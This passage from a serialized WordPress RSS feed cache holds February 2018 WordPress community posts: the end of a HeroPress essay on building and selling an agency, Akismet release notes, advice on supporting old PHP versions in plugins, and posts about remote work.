that. It&#8217;s a one-time fee and you&#8217;re done. That&#8217;s a horrible business strategy. We learned very early on, inside of WordPress world, that you have rain or shine, right; so there&#8217;s a lot of clients coming or there are no clients.</p>\n<p>You&#8217;re either slammed working from home even in the evening trying to catch up, or you&#8217;re out on the golf course wondering if you&#8217;re going to get a paycheck next week. It&#8217;s really rain or shine. So how do you create a sustainable model in your business, in your small agency, in your startup; how do you do that, so that when those slow seasons come, you can still pay your team members, you can still keep your lights on?</p>\n<p>Well, we were sitting at a WordCamp; and Jason Cohen from WP Engine was keynoting; and one of the things he said right away is, if you don&#8217;t understand how to create a reoccurring revenue stream in your small agency, you will turn your sign to closed in the next year or two. And he was so right; and it was such a light bulb moment for me that I went back straightaway from that weekend WordCamp up in Austin and I started writing out, okay, how can we create a reoccurring revenue stream? What would that look like inside of our industry?</p>\n<p>And, of course, it was support packages. We didn&#8217;t call them maintenance plans. We certainly didn&#8217;t use retainer, which can have a sense of a negative connotation, right, because of lawyers; sorry! But, still, we didn&#8217;t want to use those words because we&#8217;re already almost creating a, uh, I don&#8217;t think I want to sign up for that type of attitude.</p>\n<p>What we did is we called it support, and very easily, clients were signing up saying, oh, goodness, yes, I need that ongoing support. So use that phrasing, create a model structure where it&#8217;s required, at least for the first 12 months out of the gate as they launch that you are charging them something even as small as $99 a month. And don&#8217;t shortchange yourself on that; put together a great package that you give them that type of value.</p>\n<p>If you were to check out WebTegrity.com, you would see our support plans and what they consist of and the pricing. We&#8217;re very transparent with that. That&#8217;s the way our revenue stream almost doubled our sales in one year and allowed us to keep our lights on when June and July roll around and nobody cares about their websites because they&#8217;re on the beach.</p>\n<blockquote><p>All right, reputation was another huge part of it.</p></blockquote>\n<p>That&#8217;s one of the reasons why we named ourselves WebTegrity, but reputation, understanding that that every client that signs up, whether they&#8217;re a $5,000 website or a $50,000 website gets the same type of boutique-style, white glove, handholding relationship, right? Every single project that you launch, you want to produce the absolute, absolute best. You&#8217;re not shortchanging them; you&#8217;re not, you&#8217;re not wiring something that you hand off to the client and hope to God it doesn&#8217;t break. You really are trying to find the absolute best solution.</p>\n<p>One of the things that also kept us in high standing with our reputation, of course, was offering that training because what we don&#8217;t want to do is keep the veil covered where nobody can see what we&#8217;re doing, right. We really want to be transparent and train our clients the nerd lingo, train the clients what SEO is and what expectations should be. Having that type of open communication really just started to build together a relationship with our clients that they trusted us; and we met their expectation, right. So be sure to hold strongly to your core values for your reputation. Be sure that you&#8217;re asking people to give you great reviews because that&#8217;ll make a difference.</p>\n<blockquote><p>And the last thing I want to talk about is give back.</p></blockquote>\n<p>So at one of the WordCamp US&#8217;s that I went to, Matt himself said, listen, if you&#8217;re making a living with WordPress, you really need to try to figure out how to give back 5% of your time, just 5% of your time a week. How can you do that to give back to the community? Can you start a meet-up group, teach a meetup group; can you facilitate a meetup group where maybe you&#8217;re just the organizer and you never have to speak because you&#8217;re not a fan of speaking?</p>\n<p>Can you organize a WordCamp, volunteer at a WordCamp? Can you write a tutorial and tell people how to do things? Can you teach a workshop; can you make a video?</p>\n<p>And, again, I had a light bulb moment. Of course, I can make videos. So my giveback to the WordPress community is my YouTube channel; every single Wednesday, I&#8217;m creating a video and putting it out there for free to the WordPress world of how to improve your online marketing. That&#8217;s made a huge impact not only, thankfully, inside the WordPress community, but also in my own business model.</p>\n<p>I actually go into WordCamps around the US and people are like, hey, aren&#8217;t you that WordPress girl; don&#8217;t you do videos? It&#8217;s a really cool feeling to be able to give back to the community because I&#8217;ve made my living using WordPress.</p>\n<h3>Understanding</h3>\n<p>So ultimately how did I turn five years into a multi-million dollar buyout? Because we have just recently sold; how did we do that? Ultimately, it was understanding that you have to be able to grow something of value. So as soon as you start your business, you should also be thinking about your exit strategy, right, even in how you name your company.</p>\n<p>If I were to name this Ashton Agency, do you think that I could&#8217;ve just walked away and handed the keys to somebody else named Johnson; it wouldn&#8217;t have worked. Think even about your name; will it stand alone? Can that become a brand that you can hand off and sell as a holistic entity?</p>\n<p>You also want to think about that revenue stream, right, and watch those sales margins. Be sure that your margins are healthy. Don&#8217;t hire until it hurts, until it absolutely hurts. Be sure that you&#8217;re structuring your offerings in such a way that you&#8217;re actually recouping your value. What does that mean? Just understand business better; watch Shark Tank, read more tutorials like this, watch more videos.</p>\n<p>Get a hold of the WordPress community, the core leaders, the speakers that travel around to all the WordCamps. Start following them on Twitter and trying to understand what it is that they&#8217;re training and teaching. There&#8217;s a lot of resources out there for you to gain some ideas from, but ultimately it was me stepping out in the San Antonio community because it was a larger firm here in San Antonio who purchased us.</p>\n<p>So we just kept hammering on the fact that we were the go-to place here in San Antonio for WordPress. We kept training; we kept doing free opportunities, going out and speaking at different events; and people kept seeing us. We kept showing up, so you&#8217;d be surprised what happens. If you keep giving back and you keep showing up to places, you keep establishing yourself as the authority, you keep learning and training and growing your own skill set and growing your team, before you know it, it can happen for you.</p>\n<p>I hope this has been helpful. If you have questions about some of this though, if you&#8217;re trying to grow up your startup, or if you&#8217;re trying to learn how to improve your revenue margins, I&#8217;m always open to a quick twitter conversation or send me an email. I&#8217;d love to connect with you.</p>\n<p>Thanks again for the opportunity to share this on HeroPress.</p>\n<p>Bye, y&#8217;all; catch me over on YouTube. Bye!</p>\n<div class=\"rtsocial-container rtsocial-container-align-right rtsocial-horizontal\"><div class=\"rtsocial-twitter-horizontal\"><div class=\"rtsocial-twitter-horizontal-button\"><a title=\"Tweet: How To Build A Company With WordPress\" class=\"rtsocial-twitter-button\" href=\"https://twitter.com/share?text=How%20To%20Build%20A%20Company%20With%20WordPress&via=heropress&url=https%3A%2F%2Fheropress.com%2Fessays%2Fbuild-company-wordpress%2F\" rel=\"nofollow\" target=\"_blank\"></a></div></div><div class=\"rtsocial-fb-horizontal fb-light\"><div class=\"rtsocial-fb-horizontal-button\"><a title=\"Like: How To Build A Company With WordPress\" class=\"rtsocial-fb-button rtsocial-fb-like-light\" href=\"https://www.facebook.com/sharer.php?u=https%3A%2F%2Fheropress.com%2Fessays%2Fbuild-company-wordpress%2F\" rel=\"nofollow\" target=\"_blank\"></a></div></div><div class=\"rtsocial-linkedin-horizontal\"><div class=\"rtsocial-linkedin-horizontal-button\"><a class=\"rtsocial-linkedin-button\" href=\"https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fheropress.com%2Fessays%2Fbuild-company-wordpress%2F&title=How+To+Build+A+Company+With+WordPress\" rel=\"nofollow\" target=\"_blank\" title=\"Share: How To Build A Company With WordPress\"></a></div></div><div class=\"rtsocial-pinterest-horizontal\"><div class=\"rtsocial-pinterest-horizontal-button\"><a class=\"rtsocial-pinterest-button\" href=\"https://pinterest.com/pin/create/button/?url=https://heropress.com/essays/build-company-wordpress/&media=https://heropress.com/wp-content/uploads/2018/02/022118-150x150.jpg&description=How To Build A Company With WordPress\" rel=\"nofollow\" target=\"_blank\" title=\"Pin: How To Build A Company With WordPress\"></a></div></div><a rel=\"nofollow\" class=\"perma-link\" href=\"https://heropress.com/essays/build-company-wordpress/\" title=\"How To Build A Company With WordPress\"></a></div><p>The post <a rel=\"nofollow\" href=\"https://heropress.com/essays/build-company-wordpress/\">How To Build A Company With WordPress</a> appeared first on <a rel=\"nofollow\" href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Feb 2018 14:00:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Kori Ashton\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Commuting Time Saved\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=47970\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"https://ma.tt/2018/02/commuting-time-saved/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:344:\"<p>On <a href=\"https://automattic.com/\">Automattic&#x27;s</a> internal <a href=\"https://buddypress.org/\">BuddyPress</a>-powered company directory, we allow people to fill out a field saying how far their previous daily commute was. 509 people have filled that out so far, and they are saving 12,324 kilometers of travel every work day. Wow!</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 19 Feb 2018 18:14:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Akismet: Version 4.0.3 of the Akismet WordPress Plugin Is Now Available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.akismet.com/?p=1985\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"https://blog.akismet.com/2018/02/19/version-4-0-3-of-the-akismet-wordpress-plugin-is-now-available/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:867:\"<p>Version 4.0.3 of <a href=\"http://wordpress.org/plugins/akismet/\">the Akismet plugin for WordPress</a> is now available.</p>\n<p>4.0.3 contains a few helpful changes:</p>\n<ul>\n<li>Adds a new scheduled task to clear out old Akismet entries in the <code>wp_commentmeta</code> table that no longer have corresponding comments in <code>wp_comments</code>.  This should help reduce Akismet&#8217;s database usage for some users.</li>\n<li>Adds a new <code>akismet_batch_delete_count</code> action so developers can optionally take action when Akismet comment data is cleaned up.</li>\n</ul>\n<p>To upgrade, visit the Updates page of your WordPress dashboard and follow the instructions. If you need to download the plugin zip file directly, links to all versions are available in <a href=\"http://wordpress.org/plugins/akismet/\">the WordPress plugins directory</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 19 Feb 2018 15:58:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Josh Smith\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"Mark Jaquith: Handling old WordPress and PHP versions in your plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://markjaquith.wordpress.com/?p=5544\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"https://markjaquith.wordpress.com/2018/02/19/handling-old-wordpress-and-php-versions-in-your-plugin/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3563:\"<p>New versions of WordPress are released about three times a year, and WordPress itself supports PHP versions all the way back to 5.2.4.</p>\n<p>What does this mean for you as a plugin developer?</p>\n<p>Honestly, many plugin developers spend too much time supporting old versions of WordPress and <strong>really</strong> old versions of PHP.</p>\n<p>It doesn&#8217;t have to be this way. You don&#8217;t need to support every version of WordPress, and you don&#8217;t have to support every version of PHP. Feel free to do this for seemingly selfish reasons. Supporting old versions is hard. You have to &#8220;unlearn&#8221; new WordPress and PHP features and use their older equivalents, or even have code branches that do version/feature checks. It increases your development and testing time. It increases your support burden.</p>\n<p>Economics might force your hand here&#8230; a bit. You can&#8217;t very well, even in 2018, require that everyone be running PHP 7.1 and the latest version of WordPress. But consider the following:</p>\n<p>97% of WordPress installs are running PHP 5.3 or higher. This gives you namespaces, late static binding, closures, Nowdoc, <strong>__DIR</strong><strong>__</strong>, and more.</p>\n<p>88% of WordPress installs are running PHP 5.4 or higher. This gives you short array syntax, traits, function-array dereferencing, guaranteed <strong>&lt;?=</strong> echo syntax availability, <strong>$this</strong> access in closures, and more.</p>\n<p>You get even more things with PHP 5.5 and 5.6 (64% of installs are running 5.6 or higher), but a lot of the syntactic goodness came in 5.3 and 5.4, with very few people running versions less than 5.4. So stop typing <strong>array()</strong>, stop writing named function handlers for simple <strong>array_map()</strong> uses, and start using namespaces to organize and simplify your code.</p>\n<p>Okay, so&#8230; how?</p>\n<p>I recommend that your main plugin file just be a simple bootstrapper, where you define your autoloader, do a few checks, and then call a method that initializes your plugin code. I also recommend that this main plugin file be PHP 5.2 compatible. This should be easy to do (just be careful not to use <strong>__DIR__</strong>).</p>\n<p>In this file, you should check the minimum PHP and WordPress versions that you are going to support. And if the minimums are not reached, have the plugin:</p>\n<ol>\n<li>Not initialize (you don&#8217;t want syntax errors).</li>\n<li>Display an admin notice saying which minimum version was not met.</li>\n<li>Deactivate itself (optional).</li>\n</ol>\n<p>Do not <strong>die()</strong> or <strong>wp_die()</strong>. That&#8217;s &#8220;rude&#8221;, and a bad user experience. Your goal here is for them to update WordPress or ask their host to move them off an ancient version of PHP, so be kind.</p>\n<p>Here is what I use:</p>\n<p><a href=\"https://gist.github.com/markjaquith/a08623974b37c2cf0207ee2b120b54da\">View code on GitHub</a></p>\n<p></p>\n<p><a href=\"https://twitter.com/markjaquith/status/965605448408813569\">Reach out on Twitter</a> and let me know what methods you use to manage PHP and WordPress versions in your plugin!</p>\n<hr />\n<p><b>Do you need <a href=\"https://coveredwebservices.com/\">WordPress services?</a></b></p>\n<p>Mark runs <a href=\"https://coveredwebservices.com/\">Covered Web Services</a> which specializes in custom WordPress solutions with focuses on security, speed optimization, plugin development and customization, and complex migrations.</p>\n<p>Please reach out to start a conversation!</p>\n[contact-form]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 19 Feb 2018 15:14:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mark Jaquith\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"Post Status: How WebDevStudios is serving different market segments — Draft podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=43724\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://poststatus.com/webdevstudios-serving-different-market-segments-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2637:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"https://play.google.com/music/m/Ih5egfxskgcec4qadr3f4zfpzzm?t=Post_Status__Draft_WordPress_Podcast\">Google Play</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Brian Krogsgard and co-host Brian Richards.</p>\n<p>In this episode, Lisa Sabin-Wilson shares about the entangled history of WebDevStudios and eWebscapes and how she and team are targeting every level of the market. WebDevStudios focuses heavily on the upper and enterprise market segments, providing a high degree of attention and support to those clients.</p>\n<p>Sometime in 2017 Lisa did the math on all the lower-end projects that they were referring away and realized that WDS had a prime opportunity to re-introduce her former web studio, eWebscapes, as a way to serve these smaller-scope projects. This rebirth, so to speak, has positioned them to better target local communities, provide staff with more variety of work, and bring simplified processes alongside those they use for larger projects.</p>\n<p></p>\n<h3></h3>\n<h3>Key take-aways</h3>\n<ul>\n<li>Lisa observed a market opportunity and did the math first</li>\n<li>Relaunching started with a solid content strategy</li>\n<li>Simplified processes for managing a project</li>\n<li>Utilized talent already on staff</li>\n<li>Lots of opportunity to target local communities</li>\n<li>Evaluating the success of this strategy after 6 months</li>\n</ul>\n<h3>Links</h3>\n<ul>\n<li><a href=\"https://webdevstudios.com/\">WebDevStudios</a></li>\n<li><a href=\"https://ewebscapes.com/\">eWebscapes</a></li>\n<li><a href=\"https://jenniferbourn.com/profitable-project-plan/\">Profitable Project Plan</a></li>\n<li><a href=\"https://twitter.com/@lisasabinwilson\">Lisa Sabin-Wilson on Twitter</a></li>\n</ul>\n<p><a href=\"https://webdevstudios.com/about/\"><em>Photo Credit</em></a></p>\n<h3>Sponsor: Prospress</h3>\n<p><a href=\"https://prospress.com/\">Prospress</a> makes the WooCommerce Subscriptions plugin, that enables you to turn your online business into a recurring revenue business. Whether you want to ship a box or setup digital subscriptions like I have on Post Status, Prospress has you covered. Check out <a href=\"https://prospress.com/\">Prospress.com</a> for more, and thanks to Prospress for being a Post Status partner.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 16 Feb 2018 22:38:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Matt: No Office Workstyle\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=47949\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://ma.tt/2018/02/no-office-workstyle/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3938:\"<p>Reed Albergotti has a great article titled <a href=\"https://www.theinformation.com/articles/latest-amenity-for-startups-no-office\">Latest Amenity for Startups: No Office</a>. You can put in your email to read I believe but it&#x27;s behind a paywall otherwise. <a href=\"https://www.theinformation.com/\">The Information</a> is a pretty excellent site that alongside (former Automattician) <a href=\"https://stratechery.com/\">Ben Thompson&#x27;s Stratechery</a> I recommend subscribing to. Here are some quotes from the parts of the article that quote me or talk about <a href=\"https://automattic.com/\">Automattic</a>:</p>\n\n<blockquote class=\"wp-block-quote\">\n    <p>So it’s no coincidence that one of the first companies to operate with a distributed workforce has roots in the open source movement. Automattic, the company behind open source software tools like WordPress, was founded in 2005 and has always allowed its employees to work from anywhere. The company’s 680 employees are based in 63 countries and speak 79 languages. Last year, it closed its San Francisco office, a converted warehouse — because so few employees were using it. It still has a few coworking spaces scattered around the globe.</p>\n    <p>Matt Mullenweg, Automattic’s founder and CEO, said that when the company first started, its employees communicated via IRC, an early form of instant messaging. Now it uses a whole host of software that’s tailor-made for remote work, and as the technology evolves, Automattic adopts what they need.</p>\n    <p>Mr. Mullenweg said Automattic only started having regular meetings, for instance, after it started using Zoom, a video conferencing tool that works even on slow internet connections.</p>\n    <p>He’s become a proponent of office-less companies and shares what he’s learned with other founders who are attempting it. Mr. Mullenweg said he believes the distributed approach has led to employees who are even more loyal to the company and that his employees especially appreciate that they don’t need to spend a chunk of their day on a commute.</p>\n    <p>“Our retention is off the charts,” he said.</p>\n</blockquote>\n\n<p>And:</p>\n\n<blockquote class=\"wp-block-quote\">\n    <p>“Where it goes wrong is if they don’t have a strong network outside of work—they can become isolated and fall into bad habits,” Mr. Mullenweg said. He said he encourages employees to join groups, play sports and have friends outside of work. That kind of thing wouldn’t be a risk at big tech companies, where employees are encouraged to socialize and spend a lot of time with colleagues.</p>\n    <p>But for those who ask him about the negatives, Mr. Mullenweg offers anecdotal proof of a workaround.</p>\n    <p>For example, he said he has 14 employees in Seattle who wanted to beat the isolation by meeting up for work once a week. So they found a local bar that didn’t open until 5 p.m., pooled together the $250 per month co-working stipends that Automattic provides and convinced the bar’s owner to let them rent out the place every Friday.</p>\n</blockquote>\n\n<p>They didn&#x27;t need to pool all their co-working allowance to get the bar, I recall it was pretty cheap! Finally:</p>\n\n<blockquote class=\"wp-block-quote\">\n    <p>For Automattic, flying 700 employees to places like Whistler, British Columbia or Orlando, Florida, has turned into a seven-figure expense.</p>\n    <p>“I used to joke that we save it on office space and blow it on travel. But the reality is that in-person is really important. That’s a worthwhile investment,” Mr. Mullenweg said.It might take a while, but some people are convinced that a distributed workforce is the way of the future.</p>\n    <p>“Facebook is never going to work like this. Google is never going to work like this. But whatever replaces them will look more like a distributed company than a centralized one,” Mr. Mullenweg said.</p>\n</blockquote>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 16 Feb 2018 18:44:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"Matt: Kinsey Joins Automattic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=47931\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://ma.tt/2018/02/kinsey-joins-automattic/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:229:\"<p>Kinsey Wilson is joining Automattic to run WordPress.com. <a href=\"https://www.poynter.org/news/one-time-npr-and-nyt-digital-chief-new-adventure-wordpress\">Poynter covers the news and has a great interview with Kinsey.</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 15 Feb 2018 18:56:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"WPTavern: WPWeekly Episode 305 – 10up, JavaScript for WordPress Conference, and Jetpack 